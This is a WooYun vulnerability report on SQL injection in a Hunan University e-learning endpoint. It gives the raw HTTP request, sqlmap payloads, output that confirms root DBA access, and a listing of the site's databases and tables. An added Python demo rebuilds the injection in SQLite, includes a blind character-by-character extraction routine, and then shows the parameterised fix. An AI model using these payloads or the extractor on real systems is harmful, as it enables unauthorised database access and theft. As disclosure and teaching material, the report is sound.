Vulnerability summary

Defect ID: wooyun-2015-0159019

Title: SQL injection at a school of Hunan University (DBA privileges)

Vendor: hnu.cn;www.hnu.edu.cn

Author: 路人甲

Submitted: 2015-12-07 14:05

Fixed: 2016-01-21 18:22

Published: 2016-01-21 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-07: Details sent to the vendor, awaiting vendor response
2015-12-08: Vendor confirmed; details visible to the vendor only
2015-12-18: Details disclosed to core white hats and domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public

Brief description:

Details:

http://acadol.hnu.edu.cn


POST /Hunan/ajax/question/getList.do HTTP/1.1
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://acadol.hnu.edu.cn
Cookie: JSESSIONID=84C8AC98912A4DCD66DA4BBFBA892712; looyu_id=cbe248b02accdf85c0a4bb0ad3ee6529b2_10035260%3A1; looyu_10035260=v%3Acbe248b02accdf85c0a4bb0ad3ee6529b2%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do; _99_mon=%5B1%2C6%2C0%5D; __t99_10035260="_u:cbe248b02accdf85c0a4bb0ad3ee6529b2,_v:cbe248b02accdf85c0a4bb0ad3ee6529b2,_site:6759,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Facadol.hnu.edu.cn%2FHunan%2Funiversity%2Fnews%2Flist.do,_r:"
Host: acadol.hnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
by=desc&catalogId=0&courseId=0&curPage=1&key=&order=hot&pageSize=12


The key parameter is injectable.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND 3937=3937 AND 'HGnX' LIKE 'HGnX&order=hot&pageSize=12
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND (SELECT 9756 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(9756=9756,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RLdI' LIKE 'RLdI&order=hot&pageSize=12
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
current user: 'root@%'
current database: 'hndx'
current user is DBA: True
available databases [7]:
[*] hndx
[*] hndx_ceshi
[*] hunan
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


back-end DBMS: MySQL 5.0
[13:35:15] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:35:15] [INFO] fetching tables for database: 'hndx'
[13:35:15] [INFO] the SQL query used returns 454 entries
[13:35:15] [INFO] retrieved: company_detail
[13:35:16] [INFO] retrieved: edp_invitetendersrelationcompany
[13:35:16] [INFO] retrieved: edp_invitetendersrelationtutors
[13:35:17] [INFO] retrieved: el_discuss_relation_poll
[13:35:17] [INFO] retrieved: el_poll_option
[13:35:18] [INFO] retrieved: el_question_group
[13:35:18] [INFO] retrieved: el_room_relation_elgroup
[13:35:18] [INFO] retrieved: el_staff_relation_poll
[13:35:19] [INFO] retrieved: kx_admin_message
[13:35:19] [INFO] retrieved: kx_api_course_session
[13:35:19] [INFO] retrieved: kx_co_account_buy_records
[13:35:20] [INFO] retrieved: kx_co_bulletin
[13:35:20] [INFO] retrieved: kx_co_company
[13:35:20] [INFO] retrieved: kx_co_company_account
[13:35:21] [INFO] retrieved: kx_co_company_buy
[13:35:21] [INFO] retrieved: kx_co_company_license
[13:35:21] [INFO] retrieved: kx_co_company_relation_course
[13:35:22] [INFO] retrieved: kx_co_company_website
[13:35:22] [INFO] retrieved: kx_co_config
[13:35:22] [INFO] retrieved: kx_co_config_copy
[13:35:23] [INFO] retrieved: kx_co_course
[13:35:23] [INFO] retrieved: kx_co_course_auth_member
[13:35:24] [INFO] retrieved: kx_co_course_catalog
[13:35:24] [INFO] retrieved: kx_co_course_question
[13:35:24] [INFO] retrieved: kx_co_course_question_option
[13:35:25] [INFO] retrieved: kx_co_course_sco
[13:35:25] [INFO] retrieved: kx_co_course_testrule
[13:35:26] [INFO] retrieved: kx_co_courseware
[13:35:26] [INFO] retrieved: kx_co_dept
[13:35:27] [INFO] retrieved: kx_co_domain_reserve
[13:35:27] [INFO] retrieved: kx_co_knowledge_sharing
[13:35:28] [INFO] retrieved: kx_co_manager
[13:35:28] [INFO] retrieved: kx_co_message
[13:35:29] [INFO] retrieved: kx_co_module
[13:35:29] [INFO] retrieved: kx_co_mycertificate
[13:35:30] [INFO] retrieved: kx_co_point
[13:35:30] [INFO] retrieved: kx_co_read_massage
[13:35:31] [INFO] retrieved: kx_co_register
[13:35:31] [INFO] retrieved: kx_co_staff
[13:35:32] [INFO] retrieved: kx_co_staff_accont
[13:35:32] [INFO] retrieved: kx_co_staff_apply
[13:35:33] [INFO] retrieved: kx_co_staff_auth_course
[13:35:33] [INFO] retrieved: kx_co_staff_course_relation
[13:35:34] [INFO] retrieved: kx_co_staff_coursecatalog_relation
[13:35:34] [INFO] retrieved: kx_co_staff_credit_relation
[13:35:34] [INFO] retrieved: kx_co_staff_delivery
[13:35:35] [INFO] retrieved: kx_co_staff_learning_course
[13:35:35] [INFO] retrieved: kx_co_staff_online
[13:35:35] [INFO] retrieved: kx_co_staff_questionoption
[13:35:36] [INFO] retrieved: kx_co_staff_records
[13:35:36] [INFO] retrieved: kx_co_staff_workexperience
[13:35:37] [INFO] retrieved: kx_co_target
[13:35:37] [INFO] retrieved: kx_co_targetrelation
[13:35:37] [INFO] retrieved: kx_co_targetstaff
[13:35:38] [INFO] retrieved: kx_co_task_staff
[13:35:38] [INFO] retrieved: kx_co_training_offlinecourse
[13:35:39] [INFO] retrieved: kx_co_training_plan
[13:35:39] [INFO] retrieved: kx_co_training_plan_catalog_templates
[13:35:39] [INFO] retrieved: kx_co_training_plan_staff
[13:35:40] [INFO] retrieved: kx_co_training_plan_task
[13:35:40] [INFO] retrieved: kx_co_training_plan_task_staff
[13:35:41] [INFO] retrieved: kx_co_training_plan_task_staff_relevance
[13:35:41] [INFO] retrieved: kx_co_tutor
[13:35:41] [INFO] retrieved: kx_co_tutor_answer
[13:35:42] [INFO] retrieved: kx_co_tutor_answer_dtl
[13:35:42] [INFO] retrieved: kx_co_tutor_course
[13:35:43] [INFO] retrieved: kx_co_tutor_course_catalog
[13:35:43] [INFO] retrieved: kx_co_tutor_training_catalog
[13:35:43] [INFO] retrieved: kx_co_tutor_trainingclass
[13:35:44] [INFO] retrieved: kx_co_tutorthesisriew
[13:35:44] [INFO] retrieved: kx_discuss_reply
[13:35:44] [INFO] retrieved: kx_edp_authorization
[13:35:45] [INFO] retrieved: kx_edp_banner
[13:35:45] [INFO] retrieved: kx_edp_brochure
[13:35:45] [INFO] retrieved: kx_edp_brochure_relation_cour

Proof of vulnerability:

Fix recommendation:

MySQL DBA privileges...
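The two sqlmap payloads above show the shape of the bug: whatever getList.do puts into the key parameter is spliced straight into the WHERE clause, so a single quote closes the string literal and the attacker controls the rest of the condition. The following is an added example written for this page, not code from the report or from acadol.hnu.edu.cn. It rebuilds that pattern against an in-memory SQLite database (SQLite stands in for the MySQL 5.0 backend; the table name question, the columns id/title/hot, the sample rows, and the dbuser table that substitutes for MySQL's user() are all constructed assumptions), replays the report's boolean-based payload, shows how a boolean oracle of that form leaks data one character at a time, and places the bound-parameter version of the same query beside it as the fix.

```python
import sqlite3

# Constructed sample data; none of these rows come from the hndx database.
QUESTIONS = [
    (1, "How do I reset my password?", 12),
    (2, "Where are the course videos?", 7),
    (3, "Is the exam open book?", 3),
]
DB_USER = "root@%"  # the value the report shows for 'current user'


def make_db():
    """In-memory SQLite database with constructed rows (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE question (id INTEGER, title TEXT, hot INTEGER)")
    conn.executemany("INSERT INTO question VALUES (?, ?, ?)", QUESTIONS)
    # dbuser stands in for MySQL's user(), which SQLite does not provide.
    conn.execute("CREATE TABLE dbuser (name TEXT)")
    conn.execute("INSERT INTO dbuser VALUES (?)", (DB_USER,))
    return conn


def vulnerable_search(conn, key):
    """The anti-pattern the report implies: key is concatenated into the SQL text."""
    sql = ("SELECT id, title FROM question WHERE title LIKE '%" + key + "%' "
           "ORDER BY hot DESC")
    return conn.execute(sql).fetchall()


def safe_search(conn, key):
    """Same query with a bound parameter: key can only ever be a LIKE pattern."""
    sql = "SELECT id, title FROM question WHERE title LIKE ? ORDER BY hot DESC"
    return conn.execute(sql, ("%" + key + "%",)).fetchall()


def oracle(conn, condition):
    """Boolean oracle in the shape of sqlmap's payload: rows back means true."""
    payload = "' AND " + condition + " AND 'HGnX' LIKE 'HGnX"
    return len(vulnerable_search(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=64):
    """Recover the scalar result of subquery one character at a time."""
    out = ""
    for pos in range(1, max_len + 1):
        match = None
        for code in range(32, 127):  # printable ASCII
            cond = "unicode(substr((%s),%d,1))=%d" % (subquery, pos, code)
            if oracle(conn, cond):
                match = chr(code)
                break
        if match is None:  # substr() past the end yields '' -> NULL -> false
            break
        out += match
    return out


def run_demo():
    conn = make_db()
    true_payload = "' AND 3937=3937 AND 'HGnX' LIKE 'HGnX"   # from the report
    false_payload = "' AND 3937=3938 AND 'HGnX' LIKE 'HGnX"  # same, made false
    return {
        "vuln_true": len(vulnerable_search(conn, true_payload)),
        "vuln_false": len(vulnerable_search(conn, false_payload)),
        "safe_true": len(safe_search(conn, true_payload)),
        "safe_plain": safe_search(conn, "exam"),
        "extracted_user": blind_extract(conn, "SELECT name FROM dbuser"),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```

With the concatenated query the true payload returns every row and the false one returns none, which is exactly the signal sqlmap's boolean-based blind technique uses; blind_extract turns that one-bit oracle into the full "root@%" string. With the bound parameter the same payload is just a pattern that matches nothing. The error-based payload in the report depends on MySQL's duplicate-key error from GROUP BY over FLOOR(RAND(0)*2) and is not reproduced here. Parameterising the query is the fix for the injection itself; the DBA privileges the report highlights are a separate problem, since the application account should not be root.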

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-12-08 08:21

Vendor comment:

Thanks, we will fix it as soon as possible

Latest status:

None